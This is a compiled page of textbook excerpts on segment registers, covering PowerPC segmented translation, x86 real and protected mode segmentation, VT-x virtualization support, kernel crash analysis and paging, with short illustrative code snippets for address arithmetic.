Segment Register

OVERVIEW: On Memory Systems and Their Design

Bruce Jacob, ... David T. Wang, in Memory Systems, 2008

PowerPC Segmented Translation

The IBM 801 introduced a segmented design that persisted through the POWER and PowerPC architectures [Chang & Mergen 1988, IBM & Motorola 1993, May et al. 1994, Weiss & Smith 1994]. It is illustrated in Figure Ov.26. Applications generate 32-bit "effective" addresses that are mapped onto a larger "virtual" address space at the granularity of segments, 256-MB virtual regions. Sixteen segments comprise an application's address space. The top four bits of the effective address select a segment identifier from a set of 16 registers. This segment ID is concatenated with the bottom 28 bits of the effective address to form an extended virtual address. This extended address is used in the TLB and page table. The operating system performs data movement and relocation at the granularity of pages, not segments.

FIGURE Ov.26. PowerPC segmented address translation. Processes generate 32-bit effective addresses that are mapped onto a 52-bit address space via 16 segment registers, using the top 4 bits of the effective address as an index. It is this extended virtual address that is mapped by the TLB and page table. The segments provide address space protection and can be used for shared memory.
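The translation described above is simple enough to sketch in a few lines. This is a minimal illustration, not real hardware behavior: the segment register contents are invented, and a real implementation would also carry protection bits.

```python
# Sketch of PowerPC segmented address translation (Figure Ov.26).
# Segment register contents are hypothetical, for illustration only.

SEG_REGS = [0x000000] * 16          # 16 segment registers, each holding a 24-bit segment ID
SEG_REGS[3] = 0xABCDEF              # invented segment ID for segment 3

def effective_to_virtual(ea: int) -> int:
    """Map a 32-bit effective address to a 52-bit extended virtual address."""
    seg_index = (ea >> 28) & 0xF    # top 4 bits select one of 16 segment registers
    seg_id = SEG_REGS[seg_index]    # 24-bit segment identifier
    offset = ea & 0x0FFFFFFF        # bottom 28 bits: offset within the 256-MB segment
    return (seg_id << 28) | offset  # concatenate: 24 + 28 = 52 bits

va = effective_to_virtual(0x30000042)   # an effective address in segment 3
print(hex(va))                          # 0xabcdef0000042
```

It is this 52-bit value, not the 32-bit effective address, that the TLB and page table see.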

The architecture does not use explicit address-space identifiers; the segment registers ensure address space protection. If two processes duplicate an identifier in their segment registers, they share that virtual segment by definition. Similarly, protection is guaranteed if identifiers are not duplicated. If memory is shared through global addresses, the TLB and cache need not be flushed on a context switch, because the system behaves like a single address space operating system. For more details, see Chapter 31, Section 31.1.7, Perspective: Segmented Addressing Solves the Synonym Problem.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9780123797513500023

The PC

Howard Austerlitz, in Data Acquisition Techniques Using PCs (Second Edition), 2003

5.1.1 Memory Segmentation

One idiosyncrasy of the 16-bit processors in this Intel CPU family is the way 20-bit physical addresses are generated from 16-bit registers. Intel uses an approach called segmentation. A special segment register specifies which 64-Kbyte section of the 1-Mbyte address space is being accessed by another 16-bit register. A segment register changes the memory address accessed by 16 bytes at a time, because its value is shifted left by 4 bits (or multiplied by 16) to cover the entire 20-bit address space. The segment register value is added to the addressing register's 16-bit value to produce the actual 20-bit memory address. Four segment registers and five addressing registers are available in an 8088, all 16 bits wide.

For example, when the stack is accessed, the 16-bit value in the Stack Segment (SS) register is shifted left by 4 bits (to produce a 20-bit value) and added to the 16-bit Stack Pointer (SP) register to get the full 20-bit physical address of the stack. The value added to the segment is referred to as the offset. The usual notation is segment:offset. So, if the code segment (CS) contained B021h and the instruction pointer (IP) contained 12C4h, the segmented notation is B021:12C4 and the physical location addressed would be B14D4h.
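The segment:offset arithmetic above can be sketched directly; this is a minimal illustration of the shift-and-add rule, reproducing the worked example from the text:

```python
def phys_addr(segment: int, offset: int) -> int:
    """20-bit real-mode physical address: (segment << 4) + offset."""
    return ((segment << 4) + offset) & 0xFFFFF  # keep 20 bits

# The worked example from the text: CS=B021h, IP=12C4h, i.e., B021:12C4
print(hex(phys_addr(0xB021, 0x12C4)))  # 0xb14d4
```

Note that many different segment:offset pairs map to the same physical address, since the segment granularity is only 16 bytes.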

Note that throughout this book, most addresses will be presented in hexadecimal (base 16) notation (with digits 0–9, A–F) using a trailing h. For example, 100h = 256 (decimal).

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B978012068377250005X

Embedded Software

Colin Walls, in Embedded Software (Second Edition), 2012

1.3.3 Segmented Memory

A perceived drawback of flat memory is the limitation in size, determined by the word length. A 16-bit CPU could only have 64 K of memory, and a 32-bit architecture may be considered overkill for many applications. The most common solution is to use segmented memory (see Figure 1.3). Examples of chips applying this scheme are the Intel 8086 and the Hitachi H8/500.

The idea of segmented memory addressing is fairly simple. Addresses are divided into two parts: a segment number and an offset. Offsets (commonly 16 bits) are used most of the time, while the additional high-order bits are held in one or more special segment registers and assumed for all operations. To address memory over a longer range, the segment registers must be reloaded with a new value. Typically, there are individual segment registers for code, data, and stack.

The use of segmented memory necessitates the introduction of the concepts of "near" and "far" code and data. A near object may be accessed using the current segment register settings, which is fast; a far object requires a change to the relevant register, which is slower. Since segmented memory is not directly accommodated by high-level languages, near and far (or _near and _far) keywords must be introduced. With these keywords, you can specify the addressing mode used to access a code or data item. Using a "memory model," you can specify default modes. For example, a "large" model would access all objects as "far," and a "small" model would use "near" for everything. With segmented memory, the size of individual objects (e.g., modules or data arrays) is generally limited to the range addressable without changing the segment register (typically 64 K).

Compilers for chips with segmented memory typically implement a wide range of memory models and the far and near keywords.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9780124158221000015

Assembly language

A.C. Fischer-Cripps, in Newnes Interfacing Companion, 2002

2.3.10 Memory addressing

If an operand is stored in memory, then the CPU must calculate the actual physical address from which to read or write the data. The physical address is formed from a segment base address and an offset. The offset is referred to as an effective address. The segment base address can be the contents of any of the segment registers. The effective address can be formulated in a variety of ways. In general, the effective address is formed from:

EA = base + index + displacement

The actual physical address is thus: physical address = (segment base × 16) + EA

In direct memory addressing, information about the address is given in the instruction directly. An example is:

MOV AX,[0A40H]

This example says to move the contents of the memory location with offset 0A40h into the AX register. There are several points about this example that require attention. First, there is no segment base address specified in the operand. If this is the case, then the contents of DS are assumed to be the desired segment base address. Second, AX is 16 bits wide, so a word is moved from the offset and offset+1, with the msb of the AX register receiving the data at offset+1.
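The little-endian word fetch described above can be sketched as follows. The memory contents here are invented for illustration; only the byte-ordering rule comes from the text:

```python
# Word fetch as in MOV AX,[0A40H]; the bytes stored at the two offsets
# are hypothetical values chosen to make the ordering visible.
memory = {0x0A40: 0x34, 0x0A41: 0x12}

def load_word(offset: int) -> int:
    """AX gets mem[offset] in its low byte and mem[offset+1] in its high byte."""
    return memory[offset] | (memory[offset + 1] << 8)

ax = load_word(0x0A40)
print(hex(ax))  # 0x1234 -- the byte at offset+1 lands in the high half of AX
```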

The general format for direct memory addressing is: DS:[direct address]

Size codes

There are no explicit size codes used in 8086 assembly language instructions. The size code is taken from the size of the operands. For example, in the MOV instruction, moving data into or out of a segment register is always a word (2-byte) operation. Moving data into or out of AL would be a byte operation, since AL is 8 bits wide.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9780750657204501108

Early Intel® Architecture

In Power and Performance, 2015

1.3.2 Protected Mode Segmentation

Support for these memory protected regions meant that the current segmentation memory model had to be extended. Originally, segments had been fixed in size; however, that made memory protection more cumbersome, since the fixed sizes were too large for fine grained task control. In order to solve this, segments in protected mode were made variable in size. All of these changes, combined with additional changes designed to allow for the implementation of advanced features, such as swapping, simply wouldn't work within the confines of the existing segment register format. To accommodate this, the segment register format and behavior in protected mode is completely different from the segment register format and behavior in real mode.

Remember that originally the segment registers simply contained a base address that was shifted and added to the offset to produce a larger address. In this new model, the segment registers needed more room for the accounting required to support these new features. Therefore, in protected mode only, segment registers no longer held the base address of the segment, but instead pointed to a descriptor entry in a table of segment descriptors. Each eight-byte entry in this table describes the 24-bit base address, 16-bit size, and 8 bits of privilege and access information, which is used for marking segments as read only, executable, and so on. The remaining 16 bits store the segment selector, which when loaded into the 16-bit segment register effectively loads the segment. To improve performance, by avoiding the need to touch memory each time a segment operation needs to be checked, the other 48 bits of the segment descriptor are cached in a hidden register when the segment selector is loaded.
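The bookkeeping sizes named above (24-bit base, 16-bit limit, 8 access bits) can be sketched as a pack/unpack pair. Note this is only an illustration of the field widths: the real 80286/80386 descriptor layout orders and splits the fields differently.

```python
# Simplified 8-byte segment descriptor: 24-bit base, 16-bit limit, 8 access
# bits. Field ordering here is invented; real x86 descriptors interleave
# these fields for historical reasons.

def pack_descriptor(base: int, limit: int, access: int) -> int:
    assert base < (1 << 24) and limit < (1 << 16) and access < (1 << 8)
    return (base << 24) | (limit << 8) | access

def unpack_descriptor(d: int):
    return (d >> 24) & 0xFFFFFF, (d >> 8) & 0xFFFF, d & 0xFF

d = pack_descriptor(0x120000, 0xFFFF, 0x92)   # hypothetical writable data segment
print(unpack_descriptor(d))                   # (1179648, 65535, 146)
```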

In order to make segmentation usable for both the operating system and user applications while still enforcing memory protection, two segment descriptor tables exist. The global descriptor table (GDT) is a table of segment descriptors that the operating system, privilege level 0, controls, while the local descriptor table (LDT) is controlled by the user application. Two registers, the GDTR and LDTR, exist for storing the base addresses of these tables. The global and local descriptor table registers are loaded and stored with the LGDT and SGDT, and LLDT and SLDT instructions, respectively. Each segment selector has a special bit indicating whether the descriptor is located in the local or global table.
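A selector therefore carries three pieces of information: a table index, the local/global bit, and a privilege field. A minimal decode sketch, using the conventional x86 selector layout (index in the high 13 bits, table indicator in bit 2, RPL in the low 2 bits):

```python
def decode_selector(selector: int):
    """Split a 16-bit segment selector into (index, table bit, RPL)."""
    rpl = selector & 0b11         # requested privilege level: two low bits
    ti = (selector >> 2) & 0b1    # table indicator: 0 = GDT, 1 = LDT
    index = selector >> 3         # index into the chosen descriptor table
    return index, ti, rpl

# 0x000F: index 1, TI=1 (LDT), RPL=3 -- an illustrative user-mode selector
print(decode_selector(0x000F))  # (1, 1, 3)
```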

Each segment descriptor also had a present bit, indicating whether the corresponding segment was currently loaded into memory. If the segment descriptor was loaded into a segment selector register and the present bit in the descriptor was not set, the user program would be paused and an exception would be raised, giving the operating system a chance to load the relevant segment into memory from disk. Once the segment had been loaded, the user program would be resumed. All of this occurred transparently to the user program, and thus provided an early form of hardware supported virtual memory swapping. With swapping, more virtual memory could be allocated by the operating system than was physically available on the computer.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B978012800726600001X

Cloud Resource Virtualization

Dan C. Marinescu, in Cloud Computing (Second Edition), 2018

10.4 Hardware Support for Virtualization

In early 2000 it became obvious that hardware support for virtualization was necessary, and Intel and AMD started working on the first generation virtualization extensions of the x86 architecture. In 2005 Intel released two Pentium 4 models supporting VT-x, and in 2006 AMD announced Pacifica and then several Athlon 64 models.

The Virtual Machine Extension (VMX) was introduced by Intel in 2006 and AMD responded with the Secure Virtual Machine (SVM) instruction set extension. The Virtual Machine Control Structure (VMCS) of VMX tracks the host state and the guest VMs as control is transferred between them. Three types of data are stored in the VMCS:

Guest state. Holds virtualized CPU registers (e.g., control registers or segment registers) automatically loaded by the CPU when switching from kernel mode to guest mode on VMEntry.

Host state. Data used by the CPU to restore register values when switching back from guest mode to kernel mode on VMExit.

Control data. Data used by the hypervisor to inject events such as exceptions or interrupts into VMs and to specify which events should cause a VMExit; it is also used by the CPU to specify the VMExit reason.

The VMCS is shadowed in hardware to overcome the performance penalties of nested hypervisors discussed in Section 10.8. This allows the guest hypervisor to access the VMCS directly, without disrupting the root hypervisor in the case of nested virtualization. VMCS shadow access is almost as fast as in a non-nested hypervisor environment. VMX includes several instructions [250]:

1.

VMXON – enter VMX operation;

2.

VMXOFF – leave VMX operation;

3.

VMREAD – read from the VMCS;

4.

VMWRITE – write to the VMCS;

5.

VMCLEAR – clear VMCS;

6.

VMPTRLD – load VMCS pointer;

7.

VMPTRST – store VMCS pointer;

8.

VMLAUNCH/VMRESUME – launch or resume a VM; and

9.

VMCALL – call to the hypervisor.

A 2006 paper [356] analyzes the challenges of virtualizing Intel architectures and then presents the VT-x and VT-i virtualization architectures for the x86 and Itanium architectures, respectively. Software solutions at that time addressed some of the challenges, but hardware solutions could improve not only performance but also security and, at the same time, simplify the software systems. The problems faced by virtualization of the x86 architecture are:

Ring deprivileging. This means that a hypervisor forces a guest VM, including an OS and an application, to run at a privilege level greater than 0. Recall that the x86 architecture provides four protection rings, 0–3. Two solutions are then possible:

1.

The (0/1/3) mode, where the hypervisor, the guest OS, and the application run at privilege levels 0, 1, and 3, respectively; this mode is not feasible for x86 processors in 64-bit mode, as we shall see shortly.

2.

The (0/3/3) mode, where the hypervisor, a guest OS, and applications run at privilege levels 0, 3, and 3, respectively.

Ring aliasing. Such problems are created when a guest OS is forced to run at a privilege level other than the one it was originally designed for. For example, when the CS register is PUSHed, the current privilege level in the CS is also stored on the stack [356].

Address space compression. A hypervisor uses parts of the guest address space to store several system data structures, such as the interrupt-descriptor table and the global-descriptor table. Such data structures must be protected, but the guest software must have access to them.

Non-faulting access to privileged state. Several instructions, LGDT, SIDT, SLDT, and LTR, which load the registers GDTR, IDTR, LDTR, and TR, can only be executed by software running at privilege level 0, because these instructions point to data structures that control the CPU operation. However, instructions that store these registers fail silently when executed at a privilege level other than 0. This implies that a guest OS executing one of these instructions does not realize that the instruction has failed.

Guest system calls. Two instructions, SYSENTER and SYSEXIT, support low-latency system calls. The first causes a transition to privilege level 0, while the second causes a transition from privilege level 0 and fails if executed at a level higher than 0. The hypervisor must then emulate every guest execution of either of these instructions, and that has a negative impact on performance.

Interrupt virtualization. In response to a physical interrupt, the hypervisor generates a "virtual interrupt" and delivers it later to the target guest OS. But every OS has the ability to mask interrupts, thus the virtual interrupt can only be delivered to the guest OS when the interrupt is not masked. Keeping track of all guest OS attempts to mask interrupts greatly complicates the hypervisor and increases the overhead.

Access to hidden state. Elements of the system state, e.g., descriptor caches for segment registers, are hidden; there is no mechanism for saving and restoring the hidden components when there is a context switch from one VM to another.

Ring compression. Paging and segmentation are the two mechanisms to protect hypervisor code from being overwritten by a guest OS and applications. Systems running in 64-bit mode can only use paging, but paging does not distinguish between privilege levels 0, 1, and 2, thus the guest OS must run at privilege level 3, the so called (0/3/3) mode. Privilege levels 1 and 2 cannot be used; thus the name ring compression.

Frequent access to privileged resources increases hypervisor overhead. The task-priority register (TPR) is frequently used by a guest OS; the hypervisor must protect access to this register and trap all attempts to access it. That can cause a significant performance degradation.

Similar problems exist for the Itanium architecture discussed in Section 10.10.

A major architectural enhancement provided by VT-x is the support for two modes of operation and a new data structure, the VMCS, including host-state and guest-state areas, see Figure 10.3:

Figure 10.3

Figure 10.3. (A) The two modes of operation of VT-x, and the two operations to transition from one to another; (B) the VMCS includes host-state and guest-state areas which control the VM entry and VM exit transitions.

VMX root: intended for hypervisor operation, and very close to the x86 without VT-x.

VMX non-root: intended to support a VM.

When executing a VMEntry operation, the processor state is loaded from the guest-state area of the VM scheduled to run; then control is transferred from the hypervisor to the VM. A VMExit saves the processor state in the guest-state area of the running VM; it loads the processor state from the host-state area, and finally transfers control to the hypervisor. All VMExit operations use a common entry point to the hypervisor.

Each VMExit operation saves in the VMCS the reason for the exit and eventually some qualifications. Some of this information is stored as bitmaps. For example, the exception bitmap specifies which one of 32 possible exceptions caused the exit. The I/O bitmap contains one entry for each port in a 16-bit I/O space.

The VMCS area is referenced with a physical address and its layout is not fixed by the architecture, but can be optimized by a particular implementation. The VMCS includes control bits that facilitate the implementation of virtual interrupts. For example, external-interrupt exiting, when set, causes the execution of a VM exit operation; moreover, the guest is not allowed to mask these interrupts. When interrupt window exiting is set, a VM exit operation is triggered if the guest is ready to receive interrupts.

Processors based on two new virtualization architectures, VT-d and VT-c, have been developed. The first supports I/O Memory Management Unit (I/O MMU) virtualization and the second network virtualization.

Also known as PCI pass-through, I/O MMU virtualization gives VMs direct access to peripheral devices. VT-d supports:

DMA address remapping, address translation for device DMA transfers.

Interrupt remapping, isolation of device interrupts and VM routing.

I/O device assignment, the devices can be assigned by an administrator to a VM in any configuration.

Reliability features, it reports and records DMA and interrupt errors that may otherwise corrupt memory and affect VM isolation.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9780128128107000133

Getting very geeky – application and kernel cores, kernel debugger

Igor Ljubuncic, in Problem-Solving in High Performance Computing, 2015

Commands and detailed usage

Earlier, we learned about some basic commands. It is time to put them to good use. The first command we want is bt - backtrace. We want to see the execution history of the offending process, backtrace.

We have much data here, let us start digesting it slowly.

Call trace

The sequence of numbered lines, starting with the hash sign (#), is the call trace. It is a list of kernel functions executed just before the crash. This gives us a good indication of what happened before the system went down.

Instruction pointer

The first really interesting line is this one:

We have exception RIP: default_idle + 61. What does this mean? Let us discuss RIP. The three-letter acronym stands for Return Instruction Pointer; in other words, it points to a memory address, indicating the progress of program execution in memory. In our case, you can see the exact address in the line just below the bracketed exception line:

For now, the address itself is not important. Note: on 32-bit architectures, the instruction pointer is called EIP.

The second piece of information is far more useful to us. The name of the kernel function in which the RIP lies is default_idle; +61 is the offset, in decimal format, within the said function where the exception occurred. This is the really important bit that we will use later in our analysis.

Code segment (CS) register

The code between the bracketed string down to --- <exception stack> --- is the dump of registers. Most are not useful to us, except the CS register.

Again, we encounter a four-digit combination. In order to explain this concept, I need to digress a little and talk about privilege levels.

Privilege levels

Privilege level is the concept of protecting resources on a CPU. Different execution threads can have different privilege levels, which grant access to system resources, like memory regions, I/O ports, and so on. There are four levels, ranging from 0 to 3. Level 0 is the most privileged, known as Kernel mode. Level 3 is the least privileged, known as User mode.

Most modern operating systems, including Linux, ignore the intermediate two levels, using only 0 and 3. The levels are also known as rings.

Current privilege level (CPL)

The code segment (CS) register is the one that points to the segment where program instructions are stored. The two least significant bits of this register specify the Current Privilege Level (CPL) of the CPU: two bits, meaning numbers between 0 and 3.

Descriptor privilege level (DPL) and requested privilege level (RPL)

Descriptor privilege level (DPL) is the highest level of privilege that can access the resource; this value is defined in the segment descriptor. Requested privilege level (RPL) is defined in the segment selector, its last two bits. Mathematically, CPL is not allowed to exceed MAX(RPL, DPL), and if it does, this will cause a general protection fault. Now, why is all this important, you ask?

Well, for example, if you encounter a case where the system crashed while the CPL was 3, then this could indicate faulty hardware, because the system should not crash because of a problem in User mode. Alternatively, there might be a problem with a buggy system call. These are just some rough examples. Now, let us continue analyzing our crash log:

As we know, the two least significant bits specify the CPL. Two bits means four levels; however, levels 1 and 2 are ignored. This leaves us with 0 and 3, the Kernel mode and User mode, respectively. Translated into binary format, we have 00 and 11.
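The CPL extraction described here is just a two-bit mask. A small sketch, using selector values that are typical for Linux on x86-64 (kernel CS 0x10, user CS 0x33) rather than taken from this chapter's crash log:

```python
def cpl_from_cs(cs: int) -> int:
    """Current privilege level: the two least significant bits of CS."""
    return cs & 0b11

print(cpl_from_cs(0x0010))  # 0 -> ring 0, kernel mode (even last digit)
print(cpl_from_cs(0x0033))  # 3 -> ring 3, user mode (odd last digit)
```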

The format used to present the descriptor data can be confusing, but it is very simple. If the rightmost figure is even, then we are in kernel mode; if the last figure is odd, then we are in user mode. Hence, we see that the CPL is 0, since the offending task leading to the crash was running in kernel mode. This is important to know. It may help us understand the nature of our problem. Just for reference, here is an example where the crash occurred in User mode:

Back to our example, we have learned many useful, important details. We know the exact memory address at which the instruction pointer was at the time of the crash. We know the privilege level.

More importantly, we know the name of the kernel function and the offset where the RIP was pointing at the time of the crash. For all practical purposes, we just need to find the source file and examine the code. Of course, this may not always be possible, for various reasons, but we will do that, nonetheless, as an exercise.

So, we know that the crash_nmi_callback() function was called by do_nmi(), do_nmi() was called by nmi(), and nmi() was called by default_idle(), which caused the crash. We can examine these functions and try to understand more deeply what they do. We will do that soon. Now, let us revisit our Fedora example one more time.

Now that we understand what is wrong, we can take a look at the Fedora case again and try to understand the problem. We have a crash in an untainted kernel, caused by the swapper process. The crash report points to the native_apic_write_dummy function.

Then, there is also a very long call trace, containing quite a bit of useful information that should help us solve the problem. We will see how we can use the crash reports to help developers fix bugs and produce better, more stable software. Now, let us focus some more on crash and the basic commands.

Backtrace for all tasks

By default, crash will display the backtrace for the active task. But you may also want to see the backtrace of all tasks. In this case, you will want to run foreach:

Dump system message buffer

This command dumps the kernel log_buf content in chronological order. The kernel log buffer (log_buf) might contain useful clues preceding the crash, which might help us pinpoint the problem more easily and understand why our system went down.

The log command may not be really useful if you have intermittent hardware problems or purely software bugs, but it is definitely worth the effort. Here are the last few lines of our crash log:

Or alternatively, a hardware-related issue:

Display process status data

This command displays process condition for selected, or all, processes in the system. If no arguments are entered, the process data is displayed for all processes.

The crash utility may load pointing to a task that did not cause the panic, or it may not be able to find the panic task. There are no guarantees. If you are using virtual machines, including VMware or Xen, then things might get even more complicated.

Using backtrace for all processes (with foreach) and running the ps command, you should be able to locate the offending process and examine its task.

Read full chapter

URL:

https://www.sciencedirect.com/science/article/pii/B9780128010198000064

Introducing Linux

Doug Abbott, in Linux for Embedded and Real-Time Applications (Fourth Edition), 2018

Protected Mode Architecture

Before getting into the details of Linux, let's take a short detour into protected mode architecture. The implementation of protected mode memory in contemporary Intel processors first made its appearance in the 80386. It utilizes a full 32-bit address for an addressable range of 4 GB. Access is controlled such that a block of memory may be: Executable, Read only, or Read/Write. Current Intel 64-bit processors implement a 48-bit address space.

The processor can operate in one of four Privilege Levels. A program running at the highest privilege level, level 0, can do anything it wants: execute I/O instructions, enable and disable interrupts, change descriptor tables. Lower privilege levels prevent programs from performing operations that might be "dangerous." A word processing application probably should not be messing with interrupt flags, for example. That's the job of the operating system.

So application code typically runs at the lowest level, while the operating system runs at the highest level. Device drivers and other services may run at the intermediate levels. In practice, however, Linux and most other operating systems for Intel processors only use levels 0 and 3. In Linux, level 0 is called "Kernel Space" while level 3 is called "User Space."

Real Mode

To begin our discussion of protected mode programming in the x86, it's useful to review how "real" address mode works.

Back in the late 1970s, when Intel was designing the 8086, the designers faced the dilemma of how to access a megabyte of address space with only 16 bits. At the time a megabyte was considered an immense amount of memory. The solution they came up with, for better or worse, builds a 20-bit (1 megabyte) address out of two 16-bit quantities called the Segment and Offset. Shifting the segment value 4 bits to the left and adding it to the offset creates the 20-bit linear address (see Fig. 3.5).

Figure 3.5. Real mode addressing.

The x86 processors have four segment registers in real mode. Every reference to memory derives its segment value from one of these registers. By default, instruction execution is relative to the Code Segment (CS), most data references (MOV for example) are relative to the Data Segment (DS), and instructions that reference the stack are relative to the Stack Segment (SS). The Extra Segment (ES) is used in string move instructions, and can be used whenever an extra data segment is needed. The default segment selection can be overridden with segment prefix instructions.

A segment can be up to 64 Kbytes long, and is aligned on 16-byte boundaries. Programs less than 64 Kbytes are inherently position-independent, and can be easily relocated anywhere in the 1 Mbyte address space. Programs larger than 64 Kbytes, either in code or data, require multiple segments and must explicitly manipulate the segment registers.

Protected Mode

Protected mode still makes use of the segment registers, but instead of providing a piece of the address directly, the value in the segment register (now called the selector) becomes an index into a table of Segment Descriptors. The segment descriptor fully describes a block of memory including, among other things, its base and limit (see Fig. 3.6). The linear address in physical memory is computed by adding the offset in the logical address to the base contained in the descriptor. If the resulting address is greater than the limit specified in the descriptor, the processor signals a memory protection error.

Figure 3.6. Protected mode addressing.
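The base-plus-offset translation with a limit check can be sketched as follows. The descriptor table contents here are invented, and real hardware performs the check in the segmentation unit, not in software:

```python
# Sketch of protected mode translation: selector -> descriptor -> base + offset,
# with a limit check. The descriptor values are hypothetical.

descriptor_table = {
    1: {"base": 0x00100000, "limit": 0xFFFF},   # a made-up 64-KB segment
}

def translate(selector_index: int, offset: int) -> int:
    d = descriptor_table[selector_index]
    if offset > d["limit"]:
        raise MemoryError("protection error: offset beyond segment limit")
    return d["base"] + offset

print(hex(translate(1, 0x2000)))  # 0x102000
# translate(1, 0x10000) would raise, since 0x10000 exceeds the 0xFFFF limit
```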

A descriptor is an 8-byte object that tells us everything we need to know about a block of memory.

Base Address[31:0]: Starting address for this block/segment.

Limit[19:0]: Length of this segment. This may be either the length in bytes (up to 1 Mbyte), or the length in 4 Kbyte pages. The interpretation is defined by the Granularity bit.

Type: A 4-bit field that defines the kind of memory that this segment describes

S   0=this descriptor describes a "System" segment. 1=this descriptor describes a code or data segment.

DPL   Descriptor Privilege Level: A 2-bit field that defines the minimum privilege level required to access this segment.

P   Present: 1=the block of memory represented by this descriptor is present in memory. Used in paging.

G   Granularity: 0=Interpret Limit as bytes. 1=Interpret Limit as 4 Kbyte pages.

Note that, with the Granularity bit set to 1, a single segment descriptor can represent the entire 4 Gbyte address space.
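To see why, here is a small helper (illustrative only; real descriptors scatter these bits across the 8-byte object) that converts the 20-bit Limit field into a segment size in bytes:

```c
#include <stdint.h>

/* Effective segment size from the 20-bit Limit field and the
   Granularity bit: G=0 counts bytes, G=1 counts 4 Kbyte pages. */
static uint64_t segment_size(uint32_t limit20, int g)
{
    if (g)
        return ((uint64_t)limit20 + 1) << 12;  /* 4 Kbyte units */
    return (uint64_t)limit20 + 1;              /* byte units */
}
```

With G=1 and Limit=0xFFFFF the segment spans 0x100000 pages of 4 Kbytes each, i.e., the full 4 Gbyte space.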

Normal descriptors (S bit=1) describe memory blocks representing data or code. The Type field is 4 bits, where the most significant bit distinguishes between Code and Data segments. Code segments are executable; data segments are not. A code segment may or may not also be readable. A data segment may be writable. Any attempted access that falls outside the scope of the Type field (attempting to execute a data segment, for example) causes a memory protection fault.

"Flat" Versus Segmented Memory Models

Because a single descriptor can reference the full 4 Gbyte address space, it is possible to build your system by reference to a single descriptor. This is known as "flat" model addressing and is, in effect, a 32-bit equivalent of the addressing model found in most 8-bit microcontrollers, as well as the "tiny" memory model of DOS. All memory is equally accessible, and there is no protection.

Linux actually does something similar. It uses separate descriptors for the operating system and each process so that protection is enforced, but it sets the base address of every descriptor to zero. Thus, the offset is the same as the virtual address. In effect, this does away with segmentation.

Paging

Paging is the mechanism that allows each task to pretend that it owns a very large flat address space. That space is then broken down into 4 Kbyte pages. Only the pages currently being accessed are kept in main memory. The others reside on disk.

As shown in Fig. 3.7, paging adds another level of indirection. The 32-bit linear address derived from the selector and offset is divided into three fields. The high-order 10 bits serve as an index into the Page Directory. The Page Directory Entry points to a Page Table. The next 10 bits in the linear address provide an index into that table. The Page Table Entry (PTE) provides the base address of a 4 Kbyte page in physical memory called a Page Frame. The low-order 12 bits of the original linear address supply the offset into the page frame. Each task has its own Page Directory pointed to by processor control register CR3.
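The 10-10-12 split can be expressed directly in C. This hypothetical helper just pulls the three fields out of a linear address:

```c
#include <stdint.h>

/* Decompose a 32-bit linear address under the 10-10-12 model. */
static void split_10_10_12(uint32_t linear, uint32_t *pde,
                           uint32_t *pte, uint32_t *off)
{
    *pde = (linear >> 22) & 0x3FF;   /* Page Directory index  */
    *pte = (linear >> 12) & 0x3FF;   /* Page Table index      */
    *off = linear & 0xFFF;           /* offset into the frame */
}
```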

Figure 3.7. Paging.

At either stage of this lookup process, it may turn out that either the Page Table or the Page Frame is not present in physical memory. This causes a Page Fault, which in turn causes the operating system to find the corresponding page on disk and load it into an available page in memory. This in turn may require "swapping out" the page that currently occupies that memory.

A further advantage of paging is that it allows multiple tasks or processes to easily share code and data by simply mapping the appropriate sections of their individual address spaces into the same physical pages.

Paging is optional; you don't have to use it, although Linux does. Paging is controlled by a bit in processor register CR0.

Page Directory and Page Table entries are each 4 bytes long, so the Page Directory and Page Tables are a maximum of 4 Kbytes, which also happens to be the Page Frame size. The high-order 20 bits point to the base of a Page Table or Page Frame. Bits 9 to 11 are available to the operating system for its own use. Among other things, these could be used to indicate that a page is to be "locked" in memory, i.e., not swappable.
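A sketch of how those fields could be extracted from a raw 32-bit entry (field positions as described in the text; the helper names are illustrative):

```c
#include <stdint.h>

/* High-order 20 bits: base of a Page Table or Page Frame. */
static uint32_t pte_frame_base(uint32_t pte) { return pte & 0xFFFFF000u; }

/* Bits 9-11: available to the OS (e.g., a "locked" marker). */
static uint32_t pte_os_bits(uint32_t pte)    { return (pte >> 9) & 0x7; }

/* Bit 0: the Present bit. */
static int      pte_present(uint32_t pte)    { return (int)(pte & 1); }
```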

Of the remaining control bits the most interesting are:

P   Present: 1=this page is in memory. If this bit is 0, referencing this Page Directory entry or Page Table entry causes a page fault. Note that when P==0 the remainder of the entry is not relevant.

A   Accessed: 1=this page has been read or written. Set by the processor but cleared by the OS. By periodically clearing the Accessed bits, the OS can determine which pages have not been referenced in a long time and are therefore subject to being swapped out.

D   Dirty: 1=this page has been written. Set by the processor but cleared by the OS. If a page has not been written to, there is no need to write it back to disk when it has to be swapped out.

64-Bit Paging

The paging model described thus far is for 32-bit x86 processors. It is called a 10-10-12 model because the 32-bit linear address is divided into three fields of, respectively, 10 bits, 10 bits, and 12 bits. In a 64-bit machine, entries in the Page Directory and Page Tables are 8 bytes, so a 4 KB page holds 512 entries, indexed by 9 bits. Current 64-bit processors implement only 48 bits of physical addressing for a maximum of 256 TB of memory. Two more tiers of address translation are added to yield a 9-9-9-9-12 model.
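The 9-9-9-9-12 decomposition can be sketched the same way. In this illustrative helper (an assumption on my part, with idx[0] as the top-level table index), each level peels off nine bits above the 12-bit page offset:

```c
#include <stdint.h>

/* Decompose a 48-bit virtual address under the 9-9-9-9-12 model:
   four 9-bit table indices (idx[0] = top level) plus a 12-bit offset. */
static void split_48(uint64_t va, unsigned idx[4], unsigned *off)
{
    *off = (unsigned)(va & 0xFFF);
    for (int level = 0; level < 4; level++)
        idx[3 - level] = (unsigned)((va >> (12 + 9 * level)) & 0x1FF);
}
```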


Hardware and Security

Gedare Bloom, ... Rahul Simha, in Handbook on Securing Cyber-Physical Critical Infrastructure, 2012

Memory Protection in Commodity Systems

Consider an abstract computing device comprising two major components: the processor and memory. The processor fetches code and data from memory to execute programs. If both components are shared by all programs, then a program might corrupt or steal another's data in memory, accidentally or maliciously, or prevent any other program from accessing the processor (denial-of-service). To avoid such scenarios, a privileged entity must control the allocation (time and space) of compute resources (processor and memory). Traditionally, the OS kernel is responsible for deciding how to allocate resources, and hardware enforces the kernel's decisions by supporting different privilege rings or levels (Figure 12-2).

